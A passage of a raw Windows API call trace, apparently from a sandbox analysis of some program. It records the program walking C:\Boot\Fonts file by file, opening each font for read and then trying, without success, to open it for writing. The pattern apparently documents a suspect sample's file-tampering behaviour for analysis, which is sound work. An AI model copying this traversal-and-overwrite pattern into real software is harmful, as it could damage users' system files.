returned 0x5cb40 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.183] AreFileApisANSI () returned 1 [0083.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\chs_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\chs_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.184] AreFileApisANSI () returned 1 [0083.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78450 [0083.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x78450, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\chs_boot.ttf") returned 27 [0083.184] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.184] GetFileType (hFile=0x42c) returned 0x1 [0083.184] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78450 | out: hHeap=0x20000) returned 1 [0083.184] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.184] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.185] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.185] CloseHandle (hObject=0x42c) returned 1 [0083.185] AreFileApisANSI () returned 1 [0083.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x786d0 [0083.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x786d0, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\chs_boot.ttf") returned 27 [0083.185] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.185] GetLastError () returned 0x5 [0083.185] GetLastError () returned 0x5 [0083.185] SetLastError (dwErrCode=0x5) [0083.185] GetLastError () returned 0x5 [0083.185] SetLastError (dwErrCode=0x5) [0083.185] GetLastError () returned 0x5 [0083.185] SetLastError (dwErrCode=0x5) [0083.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x786d0 | out: hHeap=0x20000) returned 1 [0083.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.185] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.186] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.186] AreFileApisANSI () returned 1 [0083.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\cht_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\cht_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0083.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.187] AreFileApisANSI () returned 1 [0083.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x784d0 [0083.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x784d0, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\cht_boot.ttf") returned 27 [0083.187] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.188] GetFileType (hFile=0x42c) returned 0x1 [0083.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x784d0 | out: hHeap=0x20000) returned 1 [0083.188] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.188] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.188] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.188] CloseHandle (hObject=0x42c) returned 1 [0083.188] AreFileApisANSI () returned 1 [0083.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78610 [0083.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78610, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\cht_boot.ttf") returned 27 [0083.189] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.189] GetLastError () returned 0x5 [0083.189] GetLastError () returned 0x5 [0083.189] SetLastError (dwErrCode=0x5) [0083.189] GetLastError () returned 0x5 [0083.189] SetLastError (dwErrCode=0x5) [0083.189] GetLastError () returned 0x5 [0083.189] SetLastError (dwErrCode=0x5) [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78610 | out: hHeap=0x20000) returned 1 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.189] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0083.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.190] AreFileApisANSI () returned 1 [0083.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\jpn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\jpn_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.190] AreFileApisANSI () returned 1 [0083.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78110 [0083.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78110, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 27 [0083.191] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.192] GetFileType (hFile=0x42c) returned 0x1 [0083.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78110 | out: hHeap=0x20000) returned 1 [0083.192] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.192] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.192] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.193] CloseHandle (hObject=0x42c) returned 1 [0083.197] AreFileApisANSI () returned 1 [0083.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78710 [0083.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78710, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 27 [0083.197] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.197] GetLastError () returned 0x5 [0083.197] GetLastError () returned 0x5 [0083.197] SetLastError (dwErrCode=0x5) [0083.197] GetLastError () returned 0x5 [0083.197] SetLastError (dwErrCode=0x5) [0083.197] GetLastError () returned 0x5 [0083.197] SetLastError (dwErrCode=0x5) [0083.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78710 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.198] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.198] HeapFree (in: 